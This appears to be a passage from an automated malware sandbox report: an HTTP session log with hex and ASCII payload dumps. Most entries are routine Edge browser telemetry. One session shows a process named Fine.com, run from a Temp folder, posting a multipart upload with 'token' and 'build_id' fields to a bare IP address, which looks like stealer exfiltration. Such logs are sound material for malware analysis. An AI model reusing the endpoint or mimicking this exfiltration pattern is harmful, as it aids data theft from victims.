                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:17 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          36192.168.2.55010813.89.179.134437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC1034OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698994931&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 11429
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC11429OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 32 54 31 36 3a 32 33 3a 31 34 2e 39 33 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 32 66 32 61 64 65 2d 38 37 38 61 2d 34 66 61 34 2d 39 62 33 31 2d 30 35 39 37 37 38 31 62 66 33 30 37 22 2c 22 65 70 6f 63 68 22 3a 22 37 34 37 34 34 35 36 34 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-12T16:23:14.930Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=b54b9a4a1cf141b48ac936a25dcc452a&HASH=b54b&LV=202501&V=4&LU=1736698996627; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=35f98d4a1f8f4bb492b496e29f8e333d; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1696
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:16 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          37192.168.2.55010713.89.179.134437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698994940&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 5054
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC5054OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 32 54 31 36 3a 32 33 3a 31 34 2e 39 33 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 32 66 32 61 64 65 2d 38 37 38 61 2d 34 66 61 34 2d 39 62 33 31 2d 30 35 39 37 37 38 31 62 66 33 30 37 22 2c 22 65 70 6f 63 68 22 3a 22 37 34 37 34 34 35 36 34 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-12T16:23:14.939Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:16 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=d5627e09a8794c798abb171027cafb07&HASH=d562&LV=202501&V=4&LU=1736698996637; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=68957851355947e4bc24e81ead98052a; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1697
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:16 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          38192.168.2.55011213.89.179.134437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698995651&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 5335
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=; _C_ETH=1
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC5335OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 32 54 31 36 3a 32 33 3a 31 35 2e 36 34 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 32 66 32 61 64 65 2d 38 37 38 61 2d 34 66 61 34 2d 39 62 33 31 2d 30 35 39 37 37 38 31 62 66 33 30 37 22 2c 22 65 70 6f 63 68 22 3a 22 37 34 37 34 34 35 36 34 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-12T16:23:15.649Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=49bdfc107416414ca63f26d48f6d5acb&HASH=49bd&LV=202501&V=4&LU=1736698997190; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=52d8392af77f49c38a346cdec6622f9e; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1539
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:17 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          39192.168.2.550113195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC185OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1VK6FCJW4E37Q9R9Z5X
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 131557
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 56 4b 36 46 43 4a 57 34 45 33 37 51 39 52 39 5a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 51 31 56 4b 36 46 43 4a 57 34 45 33 37 51 39 52 39 5a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 51 31 56 4b 36 46 43 4a 57 34 45 33 37 51 39 52 39 5a 35 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------Q1VK6FCJW4E37Q9R9Z5XContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------Q1VK6FCJW4E37Q9R9Z5XContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------Q1VK6FCJW4E37Q9R9Z5XCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
